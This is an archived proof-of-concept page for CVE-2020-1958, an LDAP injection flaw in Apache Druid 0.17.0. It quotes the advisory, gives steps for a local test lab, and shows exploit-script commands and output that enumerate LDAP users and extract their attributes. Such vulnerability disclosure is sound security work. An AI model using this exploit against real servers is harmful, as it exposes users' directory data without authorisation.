支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 9f1ac3042d3fb87d0fe217872815e1171c8c9c01

来源
https://github.com/ggolawski/CVE-2020-1958
关联漏洞
标题:Apache Druid 注入漏洞 (CVE-2020-1958)
Description:Apache Druid是美国阿帕奇(Apache)基金会的一款使用Java语言编写的、面向列的开源分布式数据库。 Apache Druid 0.17.0版本中存在注入漏洞。该漏洞源于网络系统或产品在运行过程中存在配置等错误。未授权的攻击者可利用漏洞获取受影响组件敏感信息。
Description
CVE-2020-1958 PoC
介绍
# CVE-2020-1958 PoC

CVE-2020-1958 is high severity LDAP injection vulnerability in [Apache Druid](https://druid.apache.org/) 0.17.0. It allows an attacker to bypass LDAP search filter and to retrieve any LDAP attribute values of users that exist on the LDAP server.

From official Apache Druid [advisory](https://seclists.org/oss-sec/2020/q2/5):

> When LDAP authentication is enabled:
> - Callers of Druid APIs with a valid set of LDAP credentials can bypass the `credentialsValidator.userSearch` filter barrier that determines if a valid LDAP user is allowed to authenticate with Druid. They are still subject to role-based authorization checks, if configured.
> - Callers of Druid APIs can retrieve any LDAP attribute values of users that exist on the LDAP server, so long as that information is visible to the Druid server. This information disclosure does not require the caller itself to be a valid LDAP user.

## PoC

The [poc.py](poc.py) script demonstrates how an unauthorized attacker can enumerate users on LDAP server integrated with Druid and fetch the value of any attribute of any user.

### Local Druid test server

Skip this step if you already have a Druid server with enabled LDAP authentication.

1. Download Druid 0.17.0 and extract it

   ```shell
   $ wget https://archive.apache.org/dist/druid/0.17.0/apache-druid-0.17.0-bin.tar.gz
   $ tar -zxf apache-druid-0.17.0-bin.tar.gz
  
2. Enable and configure LDAP authentication in `conf/druid/single-server/nano-quickstart/_common/common.runtime.properties`

   * Enable `druid-basic-security` extension

     Locate `druid.extensions.loadList` and add `druid-basic-security`:

     ```properties
     druid.extensions.loadList=["druid-hdfs-storage", "druid-kafka-indexing-service", "druid-datasketches", "druid-basic-security"]
     ```
  
   * Configure LDAP authentication

     Add the following at the end of the file:

     ```properties
     druid.auth.authenticatorChain=["ldap"]

     druid.auth.authenticator.ldap.type=basic
     druid.auth.authenticator.ldap.initialAdminPassword=password
     druid.auth.authenticator.ldap.initialInternalClientPassword=password
     druid.auth.authenticator.ldap.credentialsValidator.type=ldap
     druid.auth.authenticator.ldap.credentialsValidator.url=ldap://127.0.0.1:2389
     druid.auth.authenticator.ldap.credentialsValidator.bindUser=cn=admin,dc=example,dc=org
     druid.auth.authenticator.ldap.credentialsValidator.bindPassword=admin
     druid.auth.authenticator.ldap.credentialsValidator.baseDn=dc=example,dc=org
     druid.auth.authenticator.ldap.credentialsValidator.userSearch=(&(uid=%s)(memberof=cn=users,dc=example,dc=org))
     druid.auth.authenticator.ldap.credentialsValidator.userAttribute=uid
     druid.auth.authenticator.ldap.authorizerName=MyAuthorizer

     druid.escalator.type=basic
     druid.escalator.internalClientUsername=user1
     druid.escalator.internalClientPassword=user1
     druid.escalator.authorizerName=MyAuthorizer

     druid.auth.authorizers=["MyAuthorizer"]
     druid.auth.authorizer.MyAuthorizer.type=basic
     druid.auth.authorizer.MyAuthorizer.initialAdminUser=user1
     druid.auth.authorizer.MyAuthorizer.initialAdminRole=admin
     druid.auth.authorizer.MyAuthorizer.roleProvider.type=ldap
     ```

3. Run OpenLDAP server

   ```shell
   $ docker run -p 2389:389 --name my-openldap-container osixia/openldap:1.3.0
   ```

4. Import users from [users.ldif](users.ldif) to LDAP

   ```shell
   $ ldapadd -x -D "cn=admin,dc=example,dc=org" -w admin -H ldap://localhost:2389 -f users.ldif
   ```

5. Run Druid server

   ```shell
   $ bin/start-nano-quickstart
   ```

### Enumerate users

[![asciicast](https://asciinema.org/a/enOT26z1Slsee3xEjBw1OL0Aw.svg)](https://asciinema.org/a/enOT26z1Slsee3xEjBw1OL0Aw)

```shell
$ ./poc.py --url http://127.0.0.1:8888/
[INFO] Enumerating users from http://127.0.0.1:8888/
admin1
admin2
admin3
admin4
admin5
admin6
admin7
user1
user2
user3
user4
```

### Retrieve LDAP attributes' values of `admin1` user

[![asciicast](https://asciinema.org/a/eY8vBXftW00dQaYnJOsGO0ZOZ.svg)](https://asciinema.org/a/eY8vBXftW00dQaYnJOsGO0ZOZ)

```shell
$ ./poc.py --url http://127.0.0.1:8888/ --user admin1 --attr mail
[INFO] Exfiltrating mail attribute of admin1 user from http://127.0.0.1:8888/
admin1@example.com
$ ./poc.py --url http://127.0.0.1:8888/ --user admin1 --attr givenName
[INFO] Exfiltrating givenName attribute of admin1 user from http://127.0.0.1:8888/
admin1
$ ./poc.py --url http://127.0.0.1:8888/ --user admin1 --attr sn
[INFO] Exfiltrating sn attribute of admin1 user from http://127.0.0.1:8888/
last
```
文件快照

 [4.0K]  /data/pocs/9f1ac3042d3fb87d0fe217872815e1171c8c9c01
├── [2.6K]  poc.py
├── [4.5K]  README.md
└── [3.7K]  users.ldif

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。